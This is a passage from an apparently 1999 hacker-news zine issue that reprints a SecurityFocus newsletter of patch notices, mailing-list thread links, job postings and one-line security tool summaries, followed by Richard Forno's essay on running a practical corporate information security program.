       ftp://ftp.redhat.com/pub/redhat/updates/6.1/i386/lpr-0.43-2.i386.rpm
       Alpha:
       ftp://ftp.redhat.com/pub/redhat/updates/6.0/alpha/lpr-0.43-2.alpha.rpm
       Sparc:
       ftp://ftp.redhat.com/pub/redhat/updates/6.0/sparc/lpr-0.43-2.sparc.rpm
       Source packages:
       ftp://ftp.redhat.com/pub/redhat/updates/6.1/SRPMS/lpr-0.43-2.src.rpm
      
      Relevant URLS:
      http://www.redhat.com/corp/support/errata/index.html
      http://www.securityfocus.com/bid/718
      
      10. Vendor: Microsoft
      Product: Microsoft Internet Explorer
      Vulnerability Patched: Microsoft IE5 Javascript URL Redirection Vulnerability
      BugTraq ID: 722
      Patch Location:
      Workaround detailed in advisory located at:
      http://www.microsoft.com/security/bulletins/MS99-043faq.asp
      Full patch not released yet.
      Relevant URLS:
      http://security.microsoft.com
      http://www.securityfocus.com/bid/722
      
      11. Vendor: Compaq
      Product: Tru64 Unix
      Vulnerability Patched: Multiple Vendor CDE dtaction Userflag Buffer Overflow Vulnerability
      BugTraq ID: 635
      Special Note: This vulnerability affected products from multiple vendors,
      this patch is only for True64/Compaq products.
      Patch Location:
      http://www.service.digital.com/patches
      Patch file name: SSRT0615U_dtaction.tar
      Use the FTP access option, select DIGITAL_UNIX directory
      then choose the appropriate version directory and
      download the patch accordingly.
      Relevant URLS:
      http://ftp.service.digital.com/public/osf/v4.0d/ssrt0615u_dtaction.README
      http://www.securityfocus.com/bid/635
      
      12. Vendor: Debian
      Product: Debian GNU/Linux
      Vulnerability Patched: Multiple Vendor amd Buffer Overflow Vulnerability
      BugTraq ID: 614
      Special Note: This vulnerability affected products from multiple vendors,
      this patch is only for Debian products.
      Patch Location:
      http://security.debian.org/dists/stable/updates/source/amd_upl102.orig.tar.gz
      Relevant URLS:
      http://www.debian.org/security
      http://www.securityfocus.com/bid/614
      
      13. Vendor: Debian
      Product: GNU/Linux
      Vulnerability Patched: Linux mirror Vulnerability
      BugTraq ID:
      Patch Location:
      http://security.debian.org/dists/stable/updates/source/mirror_2.9.orig.tar.gz
      Relevant URLS:
      http://www.debian.org/security
      
      14. Vendor: Mandrake
      Product: Linux-Mandrake
      Vulnerability Patched: Multiple Linux Vendor lpr/lpd Vulnerabilities
      BugTraq ID: 718
      Patch Location:
      ftp://csociety-ftp.ecn.purdue.edu/pub/mandrake/updates/6.1/SRPMS/lpr-0.43-1mdk.src.rpm
      Relevant URLS:
      http://www.securityfocus.com/bid/718
      
      15. Vendor: LinuxPPC
      Product: LinuxPPC
      Vulnerability Patched: Mulitple Linux Vendor PAM NIS Locked Accounts Vulnerability
      BugTraq ID: 697
      Patch Location:
      ftp://ftp.linuxppc.org/linuxppc-1999/security/RPMS/pam-0.68-8.ppc.rpm
      Relevant URLS:
      http://www.linuxppc.com/security/1999/10/12.shtml
      http://www.securityfocus.com/bid/697
      
      INCIDENTS SUMMARY 1999-10-04 to 1999-10-19
      ------------------------------------------
      
      1. Interesting scans in the past few days (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-09-29&msg=LOBIJPKEFBHDAAAA@mailcity.com
      
      1. Re: Interesting scans in the past few days (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-01&msg=19991006055120.25151.qmail@securityfocus.com
      
      2. Random malfunction or hack?
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-01&msg=4.2.0.58.19991007104131.041af600@localhost
      
      3. Notifying possibly compromised sites & SANS 99 (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-8&msg=19991010030053.2954.qmail@securityfocus.com
      
      4. Site for sharing TCPDumps, firewall logs, etc.? (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-8&msg=19991010030259.3005.qmail@securityfocus.com
      
      5. Log sharing
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-8&msg=3.0.3.32.19991012151149.0180dc90@192.133.124.9
      
      6. Attack methodology
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-8&msg=19991012230738.14149.qmail@securityfocus.com
      
      7. Slow scan of 80,8080,3128/tcp from multiple sources (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-8&msg=991013161041HK.24502@weba2.iname.net
      
      8. RES: Anyone seen traffic headed for UDP port 31789? (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-8&msg=01fd01bf1669$99f4d600$431ba396@montes.lac.inpe.br
      
      9. Intrusion Detection rfc draft
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-15&msg=199910152054.QAA08702@iridium.mv.net
      
      10. directed broadasts to UDP ports 41508, 41524, 41530.
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-15&msg=199910171958.PAA08727@rum.cs.rochester.edu
      
      V. VULN-DEV RESEARCH LIST SUMMARY 1999-10-04 to 1999-10-19
      ----------------------------------------------------------
      
      1. Re: Guestbook perl script (error fix - Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=37F95DCC.948D1E78@thievco.com
      
      2. The PcWeek crack
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=37F95F46.28909284@thievco.com
      
      3. Re: Cisco IOS password types overview. (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=19991004181832.A7373@noc.untraceable.net
      
      4. Timbuktu32 (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=37F9879E.A4A0603A@thievco.com
      
      5. Re: solaris DoS (fwd)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=Pine.LNX.4.10.9910042219160.22584-100000@noella.mindsec.com
      
      6. FW: puzzlecrypt(tm--dr) (hint:sploit against dr - so I don't go deaf)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=LPBBLGAAOGLDBEMOMNAKGENBCAAA.dr@v-wave.com
      
      7. Newbie in Jeopardy
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=19991006202821.17986.rocketmail@web1006.mail.yahoo.com
      
      8. Window manager - implementation bug/feature ??? (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=19991007042501.WPTW29939.mta02@onebox.com
      
      9. fbsd 3.3 ospf_monitor research (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-8&msg=19991008202347.17546.qmail@nwcst293.netaddress.usa.net
      
      10. SSH and X11 forwarding
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-8&msg=19991008154553.A7420@sec.sprint.net
      
      11. NT SysKey should be breakable (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-8&msg=37FE5604.E3DDEE4B@enternet.se
      
      12. 2 dodgy network programs
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-8&msg=199910091022.LAA02585@notatla.demon.co.uk
      
      13. Free BSD 2.2.x listen() problem / FTP exploit
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-15&msg=9628.991015@SECURITY.NNOV.RU
      
      14. Classes?
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-15&msg=004301bf17b3$00563de0$5016aacf@verti.com
      
      15. possible gnome remote overflow
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-15&msg=380B7985.1FAB00E@rconnect.com
      
      
      VI.  SECURITY JOBS SUMMARY 1999-10-04 to 1999-10-19
      ---------------------------------------------------
      
      Discussion:
      
      1. yet another question about entering the security field (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=19991005205523.1111.qmail@securityfocus.com
      
      Seeking Position:
      
      1. Contact: I am looking for a good company to work for NYC - Edward Saxon, <ed_saxon@hotmail.com>
      Qualifications:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&thread=19991005000908.57894.qmail@hotmail.com
      
      2. Contact: Looking for security system administration position - Ender Wiggin, Mike@aviary-mag.com
      Qualifications:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=016701bf0eab$26b42580$5f47fea9@25te1
      
      Seeking Staff:
      
      1. Unix/Network/Security Engineer - NYC
      Reply to: beau@nyc-search.com
      Position Requirements:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=37F9492A.5BDA96EC@nyc-search.com
      
      2. Developer needed - San Mateo - California
      Reply to: Alfred Huger, ah@securityfocus.com
      Position Requirements:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=Pine.GSO.4.10.9910051306001.20005-100000@www.securityfocus.com
      
      3. Unix/Network Security Engineer Needed In Maryland
      Reply to: Brian Mitchell <bmitchell@icscorp.com>
      Position Requirements:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=007301bf103b$bc3a1060$120210ac@icscorp.com
      
      4. Domain Expert / Security Development / IT / Logistics #123
      Reply to: Lori Sabat <lori@altaassociates.com>
      Position Requirements:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=19991006130555.1532.qmail@securityfocus.com
      
      5. Security Verification Analyst #123
      Reply to: Lori Sabat <lori@altaassociates.com>
      Position Requirements:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=19991006131420.1670.qmail@securityfocus.com
      
      6. looking for information security manager....
      Reply to: Bryan Bushman <bryan.bushman@capitalone.com>
      Position Requirements:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=00069FC7.C22211@capitalone.com
      
      7. Job opportunities in San Jose
      Reply to: Beth Friedman <friedman@counterpane.com>
      Position Requirements:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-8&msg=19991011182755.28416.qmail@securityfocus.com
      
      8. 3com Job Posting
      Reply to: andy_mcdaniel@3com.com
      Position Requirements:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-8&msg=8825680B.000B3EAF.00@hqoutbound.ops.3com.com
      
      VII.  SECURITY SURVEY 1999-10-04 to 1999-10-19
      ----------------------------------------------
      
      The question for 1999-10-04 to 1999-10-19 was:
      
      "Do you think the recent changes to US encryption export law will increase the use of encryption
      on in the internet?"
      
      Results:
      
      Yes 30% / 41 votes
      No 69% / 92 votes
      Total number of votes: 133 votes
      
      III.  SECURITY FOCUS EVENTS for 1999-10-04 to 1999-10-19
      ---------------------------------------------------------
      
      1. New Scoring and Comments under Tools, Products, Library and Links
      Relevant URL:
      http://www.securityfocus.com/level2/bottom.html?go=announcements&id=35
      Summary:
      
      You can now score and comments on items in the tools, products, library and links sections of
      the site. Tell others what you think of certain items. Learn what others think are the best
      resources. To vote you must be a registered user and sign-in.
      
      2. New Guest Feature - THE TRINITY OF A QUALITY INFORMATION SECURITY PROGRAM v2
      Relevant URL:
      http://www.securityfocus.com/level2/bottom.html?go=forums&forum=2&id=327
      Summary:
      
      There is a three-fold and ultimate goal of any organizational information security program. Simply put,
      such a program must take adequate measures to protect and provide levels of confidentiality, integrity,
      and availability of information resources. Yet all too often security is bypassed or ignored because it is
      too imposing, too complicated, and not perceived as an asset to the organization by both management
      and employees. A common misperception is that increased security leads to decreased convenience or
      "creature comforts." Not necessarily. Security of a corporation's information can be strong, robust,
      and secure without presenting a large burden on the user community.
      
      IX.  SECURITY FOCUS TOP 6 TOOLS 1999-10-04 to 1999-10-19
      --------------------------------------------------------
      
      1. UCGI Vulnerability Scanner 1.56
      by su1d sh3ll
      Relevant URL:
      http://infected.ilm.net/unlg/
      CGI vulnerability scanner version 1.56. Checks for over 90 CGI
      vulnerabilities. Tested on slackware linux with kernel 2.0.35-2.2.5,
      Freebsd 2.2.1-3.2, IRIX 5.3, DOS, and windows.
      
      2. NTInfoScan
      by David Litchfield
      Relevant URL:
      http://www.infowar.co.uk/mnemonix/ntinfoscan.htm
      NTInfoScan is a security scanner designed specifically for the Windows
      NT 4.0 operating system. It's simple to use - you run it from a command
      line - and when the scan is finished it produces an HTML based report of
      security issues found with hyper-text links to vendor patches and further
      information. NTInfoScan is currently at version 4.2.2. It tests a number
      of services such as ftp, telnet, web service, for security problems. Added
      to this NTInfoScan will check NetBIOS share security and User account
      security.
      
      3. SuperScan 2.0.4
      by Robin Keir <robin@keir.net>
      Relevant URL:
      http://members.home.com/rkeir/software.html
      This is a powerful connect-based TCP port scanner, pinger and hostname
      resolver. Multithreaded and asynchronous techniques make this program
      extremely fast and versatile. Perform ping scans and port scans using any
      IP range or specify a text file to extract addresses from. Scan any port
      range from a built in list or any given range. Resolve and reverse- lookup
      any IP address or range. Modify the port list and port descriptions using
      the built in editor. Connect to any discovered open port using user-
      specified "helper" applications (e.g. Telnet, Web browser, FTP) and assign
      a custom helper application to any port. Save the scan list to a text
      file.  Transmission speed control. User friendly interface. Includes help
      file.
      
      4. PacketX
      by NTObjectives Inc.
      Relevant URL:
      http://www.ntobjectives.com
      PacketX is a native Windows NT firewall testing tool that allows for
      complete TCP/IP packet creation and provides businesses a method for
      verifying a firewall vendors product claims. Featuring packet spoofing
      technology and raw packet creation techniques, this tool is essentially a
      packet cannon that shoots custom packets at a firewall in order to verify
      the approval/denial of internet domain address against firewall ACL's.
      
      5. Achtung
      by Codex Data Systems
      Relevant URL: N/A
      A Windows keylogging program by Codex Data Systems.
      
      6. Custom Attack Scripting Language
      by Thomas Ptacek & Timothy Newsham
      Relevant URL: N/A
      Custom Auditing Scripting Language (CASL) implements a packet shell
      environment for the Custom Auditing Scripting Language that is the basis
      for the Cybercop(tm)  line of products by Network Associates. The CASL
      environment provides an extremely high performance environment for sending
      and receiving any normal and/or morbid packet stream to firewalls,
      networking stacks and network intrusion detection systems as well as being
      sufficiently rich of a language to write honeypots, virtual firewalls,
      surfer hotel, phantom networks and jails.
      
      
      X. SPONSOR INFORMATION - Tripwire Security
      ------------------------------------------
      
      URL: http://www.tripwiresecurity.com/
      
      This Newsletter was sponsored by Tripwire Security. Tripwire Security
      Systems, Inc. (TSS) is a Portland-based software development company
      specializing in system security and policy compliance applications. The
      company is developing a family of Defense in Depth(SM) security solutions
      based on its Tripwirefile integrity assessment technology. Tripwire's file
      integrity assessment technology is the most fundamental component of any
      Intrusion Detection system. Tripwire monitors all servers and clients on a
      network, detecting and reporting any changes to critical system or data
      files. Tripwire can absolutely, unequivocally determine if a protected
      file has been altered in a way that violates the policy set by the
      administrator. This ensures that any change, whether due to an external
      intruder or internal misuse, will be identified and documented on a timely
      basis.  After an intrusion has been detected, Tripwire enables the system
      administrator to quickly identify which systems have been compromised,
      allowing the organization to get back to business.
      
      
      
      Alfred Huger
      VP of Operations
      Security Focus
      
      @HWA      
      
94.0  THE TRINITY OF A QUALITY INFORMATION SECURITY PROGRAM v2
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.securityfocus.com/ 

      by Richard Forno <rforno@taoiw.org>
           Tue Oct 19 1999 

                                                                                                                                                                                



      THE TRINITY OF A QUALITY INFORMATION SECURITY PROGRAM v2.0 RICHARD FORNO 
      <rforno@taoiw.org> 
      FALL 1999

     There is a three-fold and ultimate goal of any organizational information 
     security program. Simply put, such a program must take adequate measures 
     to protect and provide levels of confidentiality, integrity, and 
     availability of information resources. Yet all too often security is 
     bypassed or ignored because it is too imposing, too complicated, and not 
     perceived as an asset to the organization by both management and 
     employees. A common misperception is that increased security leads to 
     decreased convenience or "creature comforts." Not necessarily. Security of 
     a corporations information can be strong, robust, and secure without 
     presenting a large burden on the user community. 

     To reach this objective, it is essential to conduct a proactive 
     "perception management" analysis (PMA) within the organization as part of 
     an ongoing self-evaluation of the security program. The PMA must ask these 
     questions: 

     1. Does our security program adequately address the fundamental principles 
     of Confidentiality, Integrity, and Availability? (mentioned below) 

     2. Is there appropriate support and "buy-in" from management and users? 

     3. Is it "doable"? 

     The first two questions are issues unto themselves and quite 
     self-explanatory. The third, however, is a key facet to a security program 
     and the objective of this article. Contrary to popular belief, security 
     programs do NOT have to
         be complicated, but they MUST fulfill their 
     requirements by being secure and ongoing. That is its singular goal. 
     Large, bloated, securitymodels lead to inefficiency in management, 
     communications, resource allocation, security operations, and employee 
     compliance with requirements. Unfortunately, as information movesfaster 
     than corporate actions, so too does the level of threats, vulnerability, 
     and risk to such information at your company. 

     This article will discuss the elements of a Perception Management Analysis 
     in evaluating a corporate security posture. It is important to remember 
     that for this article, "information security" is not limited to "computer 
     security" but
         includes computers, networks, data, the infrastructure 
     required to convey proprietary data to another person (such as cellular 
     phones and pagers) and the day-to-day human factors involved with the 
     exchange of information. 

     To further illustrate that security must be "doable" and understandable by 
     everyone in the organization, this article is written in "plain English" 
     with several tongue-in-cheek observations and comments. Its a known fact 
     that simple
         stuff presented in clear, concise language will be 
     understood by a greater audience. A little humor never hurts, either. 

     PMA 1 

     Does it meet the fundamental principles (or Requirements) of information 
     security? 

     The following three principles can be addressed through appropriate 
     policies, procedures, and standards of conduct for your corporate 
     information resources. It is essential to understand that without proper, 
     written security policies
         approved by your senior management, there is 
     no baseline to either measure the effectiveness of your security program 
     or enforce securityrequirements, policies, or procedures within your 
     organization. The three guiding principles that form the foundation for a 
     good security program are: 

     CONFIDENTIALITY: This is simply keeping your company information private. 
     Just like the spy agencies take great precautions to protect theirs, so 
     too must corporations secure their data from domestic or foreign 
     competitors,
         criminals, and any other malcontent. The last thing you 
     want are the plans or schematics for the "Super-Secret Widget 2000" to 
     appear in the Los Angeles Times or even worse, find that your competitor 
     has released the "Not-A-Super-Secret-Anymore Widget 2000 Plus" before you 
     do at a lower price, and therefore undercut your market and stealyour 
     profits while leaving you to pick up the R&D tab! 

     Any organization that is operated by people has inherent vulnerabilities. 
     Therefore, to insure confidentiality of your corporate information, start 
     with the people. Develop and require signed non-disclosure and information
         
     resources acceptable use statements fromall employees, from CEO to New 
     Hires. As time progresses, or your requirements for confidentiality grow, 
     deploy encryption or authentication technologies and use automated 
     technical means to provide information confidentiality. Just remember 
     thatpeople will need to use these toolsand that in and of itself provides 
     a great vulnerability 1 . 

     1 People, particularly Americans, are all too trusting of others. It is 
     very easy to trick someone into revealing their passwords or access codes 
     over the phone or even in person by impersonating an "expert" or someone 
     from
         Network Support. 

     INTEGRITY: Protecting information so that it cannot be surreptitiously 
     manipulated for an adversarys gain is critical. When your company books 
     are audited, moving even one decimalpoint in a spreadsheet could prove 
     disastrous.
         A $4.5 million loss may be expected or easy to swallow, 
     but how would a $45 million loss look (or taste) if youre upper 
     management? We DO live in an age where they dont shoot the messenger, 
     right? 

     An organization that is operated by people has inherent vulnerabilities. 
     Therefore, to insure the integrity of your corporate information, start 
     with the people. Develop aprocess of background checks for key people such 
     as systems
         and database administrators, security staff, and those who 
     have "detailed, unmonitored, insideraccess" to your corporate information 
     resources and would be in a position to easily co-opt your sensitive data. 
     Insure your data is regularly backed up and stored in a 
     mannerrepresentative of the sensitivity of the data itself. Software- and 
     Management-based preventive measures to protect your data cant hurt 
     either. Above all, never blindlybelieve what you see on the screen. Double 
     check your work and numbersan age-old remedy to prevent big mistakes! 

     AVAILABILITY: Simply put, your employees need to work in a technological 
     environment that is supportive of them doing their jobs. Paying people to 
     come to work and play Solitaire on their computers since they cannot 
     access
         the network or their files is a waste of time, labor, and 
     resources. You must insure information resources (networks, systems, and 
     the informationcontained or processed within) are running to insure 
     productivity. 

     An organization that is operated by people has inherent vulnerabilities. 
     Therefore, to insure the availability of your corporate information, start 
     with the people. Developmethods to insure authorized users cannot 
     inadvertently bring
         down a network or jam-up the e-mail system. Insure 
     that your network administrators provide for redundancy ofinformation 
     resources, stand-by power, backup capabilities, and related services. 

     Any organization that is run by people has inherent vulnerabilities. 
     Thats due to the fact that most people are unaware of their security 
     responsibilities or security issues, threats, and risks to their 
     information. They are unassuming
         when it comes to how a system should 
     perform 2 . A company may spend millions on firewalls and encryption 
     technologies  and believe that they have the Good CyberKeeping Seal of 
     Impenetrable Security -- but their secrets still get out. If you have 
     closed off all technical routes for information to escape, what routes, 
     pray tell, are left for information to be disclosed, damaged, or denied 
     access? You guessed it, partner The people. 

     Is there any redundancy here? Where does it seem the greatest security 
     risk to your information come from? Hardware failures? Sometimes. Acts of 
     God? Occasionally. People? Youbetchaninety percent of the time. But rest
         
     assured, O Security Officer, for if you have adequately addressed these 
     three areas through appropriate policy and procedure, your security 
     program is off to a good start! 

     2 It is very common for a person to have a system error message alert pop 
     up every morning for six months before anything is done to remedy the 
     problem. The user in questions answer was "I thought that was supposed to 
     be
         that way." 

     PMA 2 

     Is there appropriate management support and "buy in" for your security 
     program at all levels of your organization? 

     All too often, information security programs are thrown together 
     retroactively after an incident has occurred or when someone on the top 
     floor hears about a "hacker" story on the morning news and in their 
     executive wisdom
         decides to do something about it. What they are going 
     to do they have no ideabut "weve got to do something, quick!" 

     My experience in helping establish the Information Security Office for the 
     US House of Representatives was indicative of this mindset. One incident 
     that comes to mind is when a seniorHouse Member was on vacation in Florida
         
     where his cellular phone traffic was picked up by a third party who then 
     transmitted their recordings of his conversation to the local and national 
     media. Suffice it to say, there was a considerable amount of political 
     embarrassment for this Congressman. The following Monday, our office was 
     tasked to develop a guidance document for"proper cellular phone usage" and 
     locate secured (i.e., encrypted) cellular phones for Member use. By 
     Thursday we had a report and quasi-policy document making its way to the 
     House leadership on our findings and recommendations. The next week, our 
     "guidance document" on cellular phone use was approved by the House 
     leadership and sent out to all Members. However, the four-inch thick 
     Agency-wide information security policy document requested by the House 
     leadership took nearly eighteen months to be approved. Why? Internal 
     requirements (such aspassword lengths or aging) were not as "glamorous" or 
     highly-visible as a Congressmans intercepted and well-publicized phone 
     conversation. And, as the 434 other Congressmen usedcellular phones as 
     well, there was a nearly unanimous buy-in from the "users" of the system. 

     A security program is effective only when implemented and properly 
     maintained. However, the strongest management and user support of security 
     programs is usually centered on the fallout after an embarrassment or 
     incident
         occurscorrective versus preventive actions to remedy a 
     newly-discovered vulnerability or comply with a federal or corporate 
     mandate. Directives resulting from Duress are not the best way to build a 
     security program. 

     To get upper management support for security requires tact and an ability 
     to clearly outline and convey the level of risk facing the corporation in 
     a manner that stresses the risks to the corporation most upper managers 
     are interested
         in avoiding: loss of public or client confidence, the 
     waning of shareholder support, and most importantly, the potential 
     financial losses to the corporation. The following bullets provide some 
     general guidance statements to assist corporate security officers in 
     "selling security" to upper management: 

   
     Senior management support is essential in establishing a robust security 
     program, especially in approving policies, procedures, and budget requests 
     for security products. However, to maintain an effective security program, 
     it is critical to involve the user community in the security program and 
     foster a "security mindset" throughout the organization. Believe it or 
     not, most of what constitutes good security practices can be described as 
     common sense! But, for those readers who have gotten used to my bullet 
     lists in the above paragraphs, selling security to users is best 
     accomplished by: 

     - Maintaining an open communications with your users. Dont just throw 
     together a website containing security information. Make sure that site is 
     regularly updated (giving users a reason to revisit the site), and users 
     not only
         have a way to contact the security group, but that the 
     security group contacts the user community with important information 
     through the use of timed e-mail announcements, columns in company 
     newsletters, and other awareness material promogulated throughout the 
     corporation. Above all, never be afraid to listen to your users. Be 
     approachable and never remain on your "pedestal" behind the locked doors 
     of the security office. 

     - Being proactive in security awareness. While you may not use America 
     Online at the office, it is a good bet many of your employees do. Should 
     your security group learn of a vulnerability in the AOL software, pass it 
     on to
         your user base as "for your information" material. This 
     demonstrates a level of concern for your users security posture beyond the 
     perimeter of your corporate castle. If users feel that you are looking out 
     for their "cyber-safety" as well as that of the corporation, user support 
     for security procedures will grow exponentially. At the House, I went on 
     "the offensive" in gathering intelligence on the threats to our 
     information resources. By attaining the widest and most detailed "Big 
     Picture" of the threats facing your organization you will be better 
     equipped to prepare for and respond to such threats. 

     - Making security transparent. Yes, it may make your system "iron-clad" to 
     require twenty passwords, fingerprint identification on the workstations, 
     DNA codes to check electronic mail, retinal scans, and requiring the user 
     to
         sing the first verse of "America The Beautiful" to log into the 
     corporate network, but you will pay a substantial price not only in 
     equipment to process such personal identification, but in employee support 
     and willingness to comply with a security program that has more 
     requirements for logging into a computer than for getting a backstage pass 
     at a Hanson concert. This leads to employees skirting security, writing 
     down (or sharing) their passwords with others or leaving their computers 
     logged in after close of business. Security must not place unnecessary 
     burdens on the employees, and it does not have to in order to provide 
     adequate security. In particular, strong passwords and the logging of all 
     system activity is a good place to start for most organizations. 
     Naturally, special situations (such as needing dial-in access or access to 
     sensitive networks) require additional security, but that is "part and 
     parcel" of the added requirements the employee has in accepting his 
     responsibilities that force him/her to access to such systems. 

     - Insuring people know their responsibilities. Nothing is worse than 
     finding out that your mission-critical systems administrator didnt know 
     that he/she was responsible for securing that e-mail server. Building 
     security
         knowledge into every job description and insuring managers at 
     all levels know their security roles and responsibilities will further 
     support the security culture you are attempting to create. 

     PMA 3 

     Is it "doable"? 

     The million-dollar question that I dont know the answer to. You will, 
     after several hours of meetings and group soul-searching as to the 
     effectiveness of your security program. A proper information security 
     program should not
         place unnecessary burdens on the employees, be 
     cost-prohibitive to the company, or confusing to those who administer it. 
     Are your policies, standards, incident response call-out rosters and 
     procedures known by those who need to know? Are they understandable and 
     available for anyone to reference, or are your security policies and 
     procedures dusting away on an obscure bookshelf? Is there too much 
     bureaucracy? Are policies and procedures poorly written and thus ignored or 
     unknown to your users? Do your users seem confused? Have you had incidents 
     resulting from any of these shortcomings? If the answer to any of these 
     questions is "yes" you need to examine the levels of complexity of your 
     securityprogram. 

     The military concept of unity of command is a key element in answering 
     this question. Ideally,the information security group should not be placed 
     within the operations staff of a companys information resources group. 
     Rather, it
         should be placed as a special office with a direct link to 
     the corporate Chief Information Officer (or higher) where it is not 
     burdened with layers of administrative and operational bureaucracy. In 
     Washington, as elsewhere in the world, how wellyou are perceived and paid 
     attention to depends greatly on Where You Sit within the organization. 

     Again, I reflect on my activities at the US House of Representatives. The 
     Information Security Program Office was located immediately under the 
     Chief Information Officer at the division level, right alongside the five 
     other line
         departments within the House Information Resources 
     organization. This allowed the Security Group senior-level access across 
     the entire IT organization while providing a clear, unfettered, line of 
     communication to the Chief Information Officer and other House offices on 
     sensitive issues. This level of interaction among the various division 
     managers fostered a very cooperative spirit between the Security Team and 
     the other divisions. Now as I work for a major Internet Services company, 
     my team (the Corporate Security Group) reports to the Chief Technology 
     Officer, and through him, the CEO, and the results are the same: being 
     positioned at this level greatly facilitates interaction with other senior 
     managers and across the various departments and business units, and allows 
     the security group to accomplish its mission. Unfortunately, in too many 
     environments, the security staff is located deep within the networkservices 
     department, which effectively bars it from fulfilling its enterprise-level 
     responsibilities and visibility as anything more than a "computer support" 
     office. The security group must also be free to interact with various 
     external organizations (ranging from law enforcement to other security 
     teams and divisions within the company) without having to receive constant 
     approval from many layers of upper bureaucracy. As mentioned, information 
     travels very quickly, and thethreats to such information affect companies 
     even quicker. The security group must be free to ascertain an incident, 
     call in the appropriate personnel, perform "cyber-triage" and work with 
     other systems staff and organizations to resolve the situation without 
     having to ask "May I?" to non-technical (read: "clueless") management 
     every step of the way 3 . 

     Your security groups freedom to operate more autonomously than other 
     offices in your company depends completely on how well you have cemented 
     your relationship with both senior management and your fellow division 
     chiefs
         and their staffs. Nothing is worse than receiving apager call 
     and assembling your response team to discover that the systems people 
     responsible for the system under attack have ignored your call for help or 
     are not as committed to near-real-time incident response as your security 
     team is. The commitment of other system administrators and other technical 
     staff to participating in a cohesive (proactive and reactive) security 
     activity depends greatly on how you interact with them during non-crises. 
     Remember what wasmentioned above  You are human, do NOT know it all, and 
     above all, need the help of people outside your group to effectively run a 
     security program. Being aloof and "untouchable" will only deny you the 
     support you need in running a security program. Support others when they 
     need it, and they will support you when you need it (and your job is on 
     the line!) 

     So, is it doable? It is if you have a team. Personally, I would rather 
     take technically qualified folks who are first and foremost team players 
     and turn them into a high-performance team of security professionals than 
     lead a group of
         security professionals who cant be a team. 

     3 Such latitude is usually given the security group after the upper 
     management has grown to respect the security team through its past 
     performance in the organization. The hard part is earning that level of 
     respect that provides you
         that level of operational autonomy. 

     Conclusions 

     Hopefully, at this point in the article, you have learned some "insider 
     tips" and lessons learnedabout how to develop and maintain a 
     high-performance information security organization. If not, youre out of 
     luck until the next issue.
         Its not that difficult, really. You have 
     been forewarned about the two key challenges to your security program: 
     Selling it to Management and Selling it to Users. Keeping your "doability" 
     factor in mind will facilitate both activitiesand believe me, they are 
     tough sales! Evaluating the simplicity of your program will illuminate the 
     potential bottlenecks and barriers to successful security postures and 
     awareness within your organization.May you go forth and protect your 
     information resources armed with the knowledge of today and the foresight 
     of tomorrow. Thus endeth the sermon.       
     
     @HWA
     
     

         

                                                                                 
      -=----------=-         -=----------=-        -=----------=-       -=----------=- 
                                           
                                             0                                     
                                             0                                     
                                             0
                                             o
                                           O O O   
                                             0
                                                                     
                                                                                  
      =----------=-   -=----------=-    -=----------=-   -=----------=-  -=----------=-
     
     
      =----------=-   -=----------=-    -=----------=-   -=----------=-  -=----------=-
     
     
         
            
                                HWA.hax0r.news  
     
     
     
     
     
AD.S  ADVERTI$ING.           The HWA black market                    ADVERTISEMENT$.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      
       *****************************************************************************
       *                                                                           *
       *           ATTRITION.ORG     http://www.attrition.org                      *
